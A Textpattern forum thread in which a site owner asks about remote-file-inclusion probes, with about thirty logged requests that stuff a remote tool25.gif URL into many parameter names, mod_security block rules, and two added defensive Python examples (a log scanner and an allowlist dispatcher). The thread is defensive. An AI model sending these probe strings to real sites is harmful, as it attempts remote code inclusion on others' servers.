Textpattern CMS support forum

#1 2006-12-06 15:31:40

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,350

hacking attempt?

The statistics program installed on my wife’s site (hblack.net) shows a lot of “New Resources” with the following URLs:

http://hblack.net/index.php?start=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?t=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?tool=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?view=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?visualizar=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?section=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?what=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?where=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?x=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?site=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?letter=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?link=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?resp=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?m=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?category=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?root=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?name=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?change=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?s=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?op=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?file=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?open=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?g=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?see=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?p=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?go=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?send=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?inc=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?show=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?pagina=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?include=http://207.226.250.183/tool25.gif?
http://hblack.net/index.php?path=http://207.226.250.183/tool25.gif?

They all come from different IPs/ISPs.

Is this a hacking attempt or a spam referrer? Any ideas on how I can stop this? I have earlier today blocked 207.226.250.183 via .htaccess, but I’m not sure if that is enough…


Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.

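The requests listed above are the classic shape of a remote-file-inclusion probe: a URL is stuffed into every query parameter name the scanner can think of, hoping one of them is fed to include(). Reading that off a statistics page by hand is tedious, so here is an added example (not from this thread, not Textpattern code) that parses Apache combined-format access-log lines and flags any request whose decoded parameter value is itself an absolute URL, then groups the hits by the host being pointed at, the parameter names tried and the source addresses. The log lines are constructed and use RFC 5737 documentation addresses; the regex and field names are this example's own.

```python
"""Spot remote-file-inclusion probes in web server access logs.

Added example, not from the forum thread or from Textpattern: it parses
Apache "combined" log lines and flags requests whose query-string parameter
values are themselves absolute URLs (the ?include=http://.../tool25.gif?
pattern).  The log lines below are constructed; the addresses are RFC 5737
documentation ranges.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# host ident user [time] "METHOD target HTTP/x.y" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Constructed sample log, not real traffic.  Lines 1-2 are RFI probes (the
# second one percent-encoded), lines 3-4 are ordinary requests, line 5 is junk.
SAMPLE_LOG = [
    '198.51.100.23 - - [06/Dec/2006:14:02:11 +0000] "GET /index.php?include=http://203.0.113.7/tool25.gif? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.88 - - [06/Dec/2006:14:02:12 +0000] "GET /index.php?path=http%3A%2F%2F203.0.113.7%2Ftool25.gif%3F HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.5 - - [06/Dec/2006:14:03:40 +0000] "GET /index.php?s=article&id=12 HTTP/1.1" 200 7311 "http://example.com/" "Mozilla/5.0"',
    '192.0.2.9 - - [06/Dec/2006:14:04:01 +0000] "GET /index.php?q=apache+http+server HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    'not a log line',
]


def url_valued_params(target):
    """Return (name, value) pairs for query parameters whose decoded value is
    an absolute http/https/ftp URL.  parse_qsl undoes percent-encoding, so the
    encoded variant is caught too.  The referer is deliberately not examined:
    a URL there is normal, a URL inside a parameter value is the probe."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        try:
            parts = urlsplit(value)
        except ValueError:  # e.g. unbalanced IPv6 brackets; treat as not-a-URL
            continue
        if parts.scheme in ("http", "https", "ftp") and parts.netloc:
            hits.append((name, value))
    return hits


def scan(lines):
    """Parse each log line and collect RFI-shaped requests.

    Returns (findings, summary): findings holds one dict per flagged
    parameter; summary groups them by the host the probe pointed at, the
    parameter names tried and the source addresses."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        for name, value in url_valued_params(m["target"]):
            findings.append({
                "src_ip": m["ip"],
                "time": m["time"],
                "param": name,
                "remote_host": urlsplit(value).netloc,
                "status": int(m["status"]),
            })
    summary = {
        "by_remote_host": Counter(f["remote_host"] for f in findings),
        "params": sorted({f["param"] for f in findings}),
        "src_ips": sorted({f["src_ip"] for f in findings}),
    }
    return findings, summary


if __name__ == "__main__":
    found, summary = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['time']} {f['src_ip']} ?{f['param']}= -> {f['remote_host']} (HTTP {f['status']})")
    print("probe hosts:", dict(summary["by_remote_host"]))
    print("parameters tried:", summary["params"])
    print("source addresses:", summary["src_ips"])
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines. Because the check is on the shape of the value (scheme plus host) rather than on a particular address or parameter name, it keeps working when the probing host changes, which is what a per-IP .htaccess block cannot do.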

#2 2006-12-06 16:27:40

Sencer
Archived Developer
From: cgn, de
Registered: 2004-03-23
Posts: 1,803

Re: hacking attempt?

Prevent what? Random people making random requests to your website? That’s like trying to prevent people from looking at you funny when you walk in the streets. You should keep your efforts focused on keeping all software up to date, and making sure it’s configured as securely as possible (like turning off register_globals in php.ini etc.).

For people who are still keen on blacklisting and playing catch-up with bad people, there are tools like mod_security.


#3 2006-12-06 20:50:32

zem
Developer Emeritus
From: Melbourne, Australia
Registered: 2004-04-08
Posts: 2,579

Re: hacking attempt?

Please see the FAQ. People attempt things all the time.


Alex


#4 2006-12-07 04:37:09

Mary
Sock Enthusiast
Registered: 2004-06-27
Posts: 6,236

Re: hacking attempt?

Is this a hacking attempt or a spam referrer?

A little of both, actually: it’s a spam referrer, trying to get you to load up that url, in an attempt to deface your site (it’s hoping you are vulnerable, it doesn’t know if you are or not).


#5 2006-12-07 09:04:30

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,350

Re: hacking attempt?

Sencer wrote

Prevent what? Random people making random requests to your website? That’s like trying to prevent people from looking at you funny when you walk in the streets. You should keep your efforts focused on keeping all software up to date, and making sure it’s configured as securely as possible (like turning off register_globals in php.ini etc.).
For people who are still keen on blacklisting and playing catch-up with bad people, there are tools like mod_security.

Hi Sencer. I have mod_security set to “On”, and the particular site is on 4.0.4.
Having said that, the home page is a static one with a .php extension, so as to have the statistics software included.

zem wrote:

Please see the FAQ. People attempt things all the time.

Hi Zem, I did have a look at that, and the particular site adheres to all the guidelines.

Mary wrote:

Is this a hacking attempt or a spam referrer?

A little of both, actually: it’s a spam referrer, trying to get you to load up that url, in an attempt to deface your site (it’s hoping you are vulnerable, it doesn’t know if you are or not).

Hi Mary

Any ideas on how I can stop it? I have already blocked 207.226.250.183 with .htaccess, but the attempts are still there. I have mod_security on. At the moment no harm is done, but they seem to be very insistent, and prevention might be better than a cure on this one.

Thank you all for all the advice

Last edited by colak (2006-12-07 09:06:02)


Yiannis


#6 2006-12-07 12:54:02

Sencer
Archived Developer
From: cgn, de
Registered: 2004-03-23
Posts: 1,803

Re: hacking attempt?

colak wrote:

Any ideas on how I can stop it?

There is an infinite* number of ways to formulate attacks. Do you want to spend all your time (till infinity) making an infinite number of rules to block every possible request string? And then have your webserver process that infinite list of rules for every (legitimate or not) request it receives?
A better approach might be to somehow have the webserver only respond to valid requests and simply shrug off the rest. Oh, wait, that’s already what’s happening (unless the software has security holes, in which case it makes more sense to fix the software, no?)

[* Granted, it’s not infinite in the strict mathematical sense, given that there are technical limitations on the size of requests that webservers will accept. But for all practical purposes it’s a really, really big number.]

At the moment no harm is done, but they seem to be very insistent

A stone wall might give in when people keep running against it. A father might give in if children continue to pester him with the same question. The good thing is that software doesn’t have or need patience; it also doesn’t decay. For the same set of inputs and starting from the same state, it will always give you the same result. So an attack-bot can be as persistent as it wants and serve the same attack-requests for as long as it wants; it will not bother the software.

and prevention might be better than a cure on this one.

Blacklisting is not prevention; it’s playing catch-up with attacks that have already been tried and failed. It’s the opposite of what you are trying to do. What you actually want is not to block the past attacks (they failed already), but to imagine the future attacks and block those, hence see the beginning of this comment.

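The “only respond to valid requests and shrug off the rest” approach argued in the post above is, in code, an allowlist: the request value is only ever used as a key into a fixed table of pages, never to build a path or a URL, so a parameter carrying http://…/tool25.gif? has nothing to reach and there is no rule list to keep extending. The following is an added example written for this thread, not Textpattern code and not the poster’s; the parameter name page, the PAGES table and TEMPLATE_ROOT are hypothetical.

```python
"""Allowlist dispatch for a 'page' query parameter.

Added example, not from the forum thread or from Textpattern.  It shows the
"respond only to valid requests" idea: a user-supplied value is looked up in
a fixed table and is never used to build a filesystem path or a URL.  The
parameter name, the page table and TEMPLATE_ROOT are hypothetical.
"""
from pathlib import Path
from urllib.parse import parse_qs

TEMPLATE_ROOT = Path("/var/www/site/templates")  # hypothetical location

# The complete set of pages a request may ask for.  The request value is only
# ever a key into this dict; the filenames on the right are the trusted part.
PAGES = {
    "home": "home.html",
    "about": "about.html",
    "contact": "contact.html",
}
DEFAULT_PAGE = "home"


def resolve_page(requested):
    """Map a user-supplied page name to a template path, or None when it is
    not in the table.  URL-shaped values like those in the thread, traversal
    strings and even real filenames all miss the table and return None."""
    if not requested:
        requested = DEFAULT_PAGE
    filename = PAGES.get(requested)
    if filename is None:
        return None
    path = (TEMPLATE_ROOT / filename).resolve()
    # Defence in depth: even a trusted table entry must stay under the root.
    if TEMPLATE_ROOT.resolve() not in path.parents:
        return None
    return path


def handle_request(query_string):
    """Return (status, template_path) for a request's raw query string.

    Unknown or URL-shaped page values get a 404 and nothing else happens, so
    a probing bot can repeat itself indefinitely without changing the outcome,
    which is exactly the property the post above describes."""
    params = parse_qs(query_string, keep_blank_values=True)
    requested = params.get("page", [""])[0]
    path = resolve_page(requested)
    if path is None:
        return 404, None
    return 200, path


if __name__ == "__main__":
    # Constructed requests: two legitimate, three that an RFI/traversal probe might send.
    for qs in ("", "page=about", "page=http://203.0.113.7/tool25.gif?",
               "page=../other/template.html", "page=about.html"):
        print(f"{qs!r:45} -> {handle_request(qs)}")
```

The point of the second check in resolve_page is not that PAGES is untrusted but that the allowlist and the filesystem boundary are independent controls: if someone later edits the table carelessly, the path check still refuses anything that escapes the template directory.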

#7 2006-12-08 01:47:33

Mary
Sock Enthusiast
Registered: 2004-06-27
Posts: 6,236

Re: hacking attempt?

You might try the following:

<IfModule mod_security.c>
	SecFilterEngine On

	SecFilterSelective "QUERY_STRING" "(207.226.250.183)" "nolog,redirect:http://207.226.250.183/"
</IfModule>


#8 2006-12-08 15:26:12

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,350

Re: hacking attempt?

Mary wrote:

You might try the following:

<IfModule mod_security.c>
	SecFilterEngine On

	SecFilterSelective "QUERY_STRING" "(207.226.250.183)" "nolog,redirect:http://207.226.250.183/"
</IfModule>

:( Returns a 500 on TextDrive.

Last edited by colak (2006-12-08 15:27:25)


Yiannis


#9 2006-12-09 02:12:00

Mary
Sock Enthusiast
Registered: 2004-06-27
Posts: 6,236

Re: hacking attempt?

Are you sure? It works fine for me (on TextDrive).


#10 2006-12-09 07:58:13

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,350

Re: hacking attempt?

Mary wrote:

Are you sure? It works fine for me (on TextDrive).

Yes. I deleted everything in my .htaccess just to make sure that there was no conflict, and the script returned:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, web@burnaby.textdrive.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Remember… the home page is just a static index.php one which has nothing to do with txp…


Yiannis


#11 2006-12-10 05:28:29

Mary
Sock Enthusiast
Registered: 2004-06-27
Posts: 6,236

Re: hacking attempt?

Hmm. Try it without quotes maybe?

<IfModule mod_security.c>
	SecFilterEngine On

	SecFilterSelective QUERY_STRING "(207.226.250.183)" nolog,redirect:http://207.226.250.183/
</IfModule>


#12 2006-12-10 07:32:11

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,350

Re: hacking attempt?

:( It still returns a 500.

On the up side, hits from 207.226.250.183 have now dropped to 4/day as opposed to about 30, so I guess they are steadily running out of options.


Yiannis
